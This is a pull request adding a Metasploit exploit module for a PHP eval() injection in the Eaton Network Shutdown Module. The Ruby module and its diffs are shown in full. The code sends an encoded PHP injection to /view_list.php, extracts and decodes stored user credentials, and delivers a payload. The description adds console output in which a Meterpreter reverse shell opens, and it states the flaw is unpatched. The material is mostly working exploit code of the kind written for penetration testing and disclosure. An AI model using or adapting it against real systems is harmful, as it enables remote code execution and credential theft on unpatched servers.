### PR TITLE
Exploit for OSVDB 83199 (EATON Network Shutdown Module)

### DIFF
--- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb
+++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb
@@ -79,11 +79,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Reading user credentials from the database")
 		response = execute_php_code(php)
 
-        if not response or response.code != 200 then
-            print_error("Failed: Error requesting page")
+		if not response or response.code != 200 then
+			print_error("Failed: Error requesting page")
 			return
 		end
-		
+
 		credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
 
 		return if credentials.length == 0

--- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb
+++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Description'    => %q{
 				This module exploits a vulnerability in lib/dbtools.inc which uses
 				unsanitized user input inside a eval() call. Additionally the base64 encoded
-				user credentials are extracted from the dtabase of the application.
+				user credentials are extracted from the database of the application.
 
 			},
 			'Author'         => [ 'h0ng10' ],       # original discovery, msf module
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# we use a call to phpinfo() for verification
 		res = execute_php_code("phpinfo();die();")
 
-		if (not res) or (res.code != 200)
+		if not res or res.code != 200
 			print_error("Failed: Error requesting page")
 			return CheckCode::Unknown
 		end
@@ -78,6 +78,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Reading user credentials from the database")
 		response = execute_php_code(php)
+
+        if not response or response.code != 200 then
+            print_error("Failed: Error requesting page")
+			return
+		end
+		
 		credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
 
 		return if credentials.length == 0
@@ -99,7 +105,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		param_name = rand_text_alpha(6)
 		padding = rand_text_alpha(6)
 		php_code = Rex::Text.encode_base64(code)
-		#url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
 		url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
 
 		res = send_request_cgi(

--- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb
+++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb
@@ -1,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection',
+			'Description'    => %q{
+				This module exploits a vulnerability in lib/dbtools.inc which uses
+				unsanitized user input inside a eval() call. Additionally the base64 encoded
+				user credentials are extracted from the dtabase of the application.
+
+			},
+			'Author'         => [ 'h0ng10' ],       # original discovery, msf module
+			'License'        => MSF_LICENSE,
+			'Version'		 => '$Revision$',
+			'References'     =>
+				[
+					['OSVDB', '83199'],
+					['URL', 'http://secunia.com/advisories/49103/']
+				],
+			'Payload'        =>
+				{
+					'DisableNops' => true,
+					'Space'       => 4000,
+					'Keys'		=> ['php']
+				},
+			'Platform'    => ['php'],
+			'Arch'        => ARCH_PHP,
+
+			'Targets'     => [[ 'Automatic', { }]],
+			'DefaultTarget'  => 0,
+			'Privileged' => true,
+			'DisclosureDate' => 'Jun 26 2012'
+			))
+
+		register_options(
+			[
+				Opt::RPORT(4679),
+				OptBool.new('READ_CREDS', [ true, 'Extract credentials from the target db', true ]),
+
+			], self.class)
+	end
+
+	def check
+		# we use a call to phpinfo() for verification
+		res = execute_php_code("phpinfo();die();")
+
+		if (not res) or (res.code != 200)
+			print_error("Failed: Error requesting page")
+			return CheckCode::Unknown
+		end
+
+		return CheckCode::Vulnerable if (res.body =~ /This program makes use of the Zend/)
+		return CheckCode::Safe
+	end
+
+	def read_credentials()
+		pattern = rand_text_numeric(10)
+		users_var = rand_text_alpha(10)
+		user_var = rand_text_alpha(10)
+		php = <<-EOT
+		$#{users_var} = &queryDB("SELECT * FROM configUsers;");
+		foreach($#{users_var} as $#{user_var}) {
+		print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
+		} die();
+		EOT
+
+		print_status("Reading user credentials from the database")
+		response = execute_php_code(php)
+		credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)
+
+		return if credentials.length == 0
+		print_status("Got #{credentials.length} record(s):")
+		cred_txt = "#Username:Password\n"
+		credentials.each do |record|
+			print_status("Username: #{record[0]}, Password: #{record[1]}")
+			cred_txt << "#{record[0]}:#{record[1]}\n"
+		end
+
+		loot_name = "eaton.nsm.credentials"
+		loot_type = "text/plain"
+		loot_filename = "eaton_nsm_creds.txt"
+		loot_desc = "Eaton Network Shutdown Module credentials"
+		store_loot(loot_name, loot_type, datastore['RHOST'], cred_txt, loot_filename, loot_desc)
+	end
+
+	def execute_php_code(code, opts = {})
+		param_name = rand_text_alpha(6)
+		padding = rand_text_alpha(6)
+		php_code = Rex::Text.encode_base64(code)
+		#url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
+		url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
+
+		res = send_request_cgi(
+			{
+				'uri'   =>  '/view_list.php',
+				'method' => 'POST',
+				'vars_get' =>
+					{
+						'paneStatusListSortBy' => url_param,
+					},
+				'vars_post' =>
+					{
+						param_name => php_code,
+					},
+				'headers' =>
+					{
+						'Connection' => 'Close',
+					}
+				}, 5)
+		res
+	end
+
+	def exploit
+		read_credentials unless datastore['READ_CREDS'] == false
+		print_status("Sending payload")
+		execute_php_code(payload.encoded)
+		handler
+	end
+end
+


### PR DESCRIPTION
This module adds an exploit for a vulnerability in the EATON Network Shutdown Module which I reported a while ago via Secunia. Additionally it reads the base64 encoded user credentials from the database and stores it in the metasploit loot.

According to Secunia, they were not able to get an security contact/reaction from EATON, 
therefore this vulnerability is not patched. A vulnerable version can be downloaded from the following URL:

http://powerquality.eaton.com/Products-services/Power-Management/Software-Drivers/network-shutdown.asp

For successful exploitation, you need at least one USV module, however you can simulate this by manually adding an entry into the "nodes" table of the database (Sqlite2, filename: mgedb.db) 

This module has been tested against version 3.22 build 02 (ubuntu linux) and 3.21 build 01 (windows)

Example (windows):

```
msf  exploit(eaton_nsm_code_exec) > exploit

[*] Started reverse handler on 172.16.37.141:4444 
[*] Reading user credentials from the database
[*] Got 1 record(s):
[*] Username: admin, Password: admin
[*] Sending payload
[*] Sending stage (39217 bytes) to 172.16.37.138
[*] Meterpreter session 6 opened (172.16.37.141:4444 -> 172.16.37.138:2688) at 2012-11-27 12:26:49 -0500

meterpreter > ls

Listing: C:\Program Files\EATON\NetworkShutdownModule\www
=========================================================

```

If you have any questions or comments please let me know
